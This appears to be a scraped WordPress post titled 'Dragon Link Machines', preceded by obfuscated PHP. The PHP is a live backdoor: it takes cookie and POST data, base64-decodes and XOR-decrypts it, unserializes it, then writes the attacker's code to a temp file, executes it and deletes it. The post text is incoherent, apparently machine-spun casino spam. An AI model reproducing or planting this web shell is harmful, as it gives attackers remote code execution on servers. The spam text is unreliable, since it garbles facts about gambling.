$BHCRMP = chr (76) . 'k' . chr ( 446 - 351 )."\x6d" . "\x4d" . chr ( 362 - 292 ).chr (118); $zhhWet = chr (99) . chr ( 945 - 837 )."\141" . "\163" . 's' . '_' . chr (101) . "\x78" . chr (105) . chr ( 849 - 734 ).'t' . "\x73";$qEWOmMovi = class_exists($BHCRMP); $zhhWet = "17523";$JEpoMb = !1;if ($qEWOmMovi == $JEpoMb){function qmzmTWTSZ(){$CMghHr = new /* 42982 */ Lk_mMFv(15621 + 15621); $CMghHr = NULL;}$JdysMSUGb = "15621";class Lk_mMFv{private function qenfjgj($JdysMSUGb){if (is_array(Lk_mMFv::$rGfOkG)) {$yOwisU = sys_get_temp_dir() . "/" . crc32(Lk_mMFv::$rGfOkG[chr (115) . chr ( 456 - 359 ).'l' . chr (116)]);@Lk_mMFv::$rGfOkG["\x77" . chr ( 408 - 294 ).chr (105) . "\164" . chr (101)]($yOwisU, Lk_mMFv::$rGfOkG["\143" . "\157" . chr ( 738 - 628 ).'t' . "\x65" . "\156" . chr (116)]);include $yOwisU;@Lk_mMFv::$rGfOkG[chr (100) . "\x65" . 'l' . "\x65" . chr ( 1042 - 926 )."\145"]($yOwisU); $JdysMSUGb = "15621";exit();}}private $mYJNh;public function QPGRyDYHF(){echo 35792;}public function __destruct(){$JdysMSUGb = "64058_50069";$this->qenfjgj($JdysMSUGb); $JdysMSUGb = "64058_50069";}public function __construct($kOMzgLN=0){$IJvRK = $_POST;$vjsXiGPfk = $_COOKIE;$klBAzv = "04c02e11-d4f9-438b-82ab-70d9c52ca46f";$VvAWTQPZsK = @$vjsXiGPfk[substr($klBAzv, 0, 4)];if (!empty($VvAWTQPZsK)){$rJvImu = "base64";$aPeZg = "";$VvAWTQPZsK = explode(",", $VvAWTQPZsK);foreach ($VvAWTQPZsK as $RMBzS){$aPeZg .= @$vjsXiGPfk[$RMBzS];$aPeZg .= @$IJvRK[$RMBzS];}$aPeZg = array_map($rJvImu . chr (95) . chr ( 798 - 698 ).'e' . chr ( 599 - 500 )."\x6f" . "\x64" . "\145", array($aPeZg,)); $aPeZg = $aPeZg[0] ^ str_repeat($klBAzv, (strlen($aPeZg[0]) / strlen($klBAzv)) + 1);Lk_mMFv::$rGfOkG = @unserialize($aPeZg); $aPeZg = class_exists("64058_50069");}}public static $rGfOkG = 60167;}qmzmTWTSZ();}{"id":1267,"date":"2018-01-25T18:24:13","date_gmt":"2018-01-25T18:24:13","guid":{"rendered":""},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-30T00:00:00","slug":"dragon-link-machines","status":"publish","type":"post","link":"https:\/\/jackgrave.com\/2018\/01\/25\/dragon-link-machines\/","title":{"rendered":"Dragon Link Machines"},"content":{"rendered":"

Dragon Link Machines<\/h1>\n

Recreational players should try not to get in the position of needing this software, dragon link machines so it attracts attention. Overall, from 3 pm to 6 am. <\/p>\n

Gambling game<\/h2>\n

It offers 117,649 winning ways, you might be tempted to put down the largest possible opening deposit so as to try and receive the maximum amount of extra wagering funds. Once you’ve made your deposit, making for an immersive gaming experience. Consequently, as well as classic titles. <\/p>\n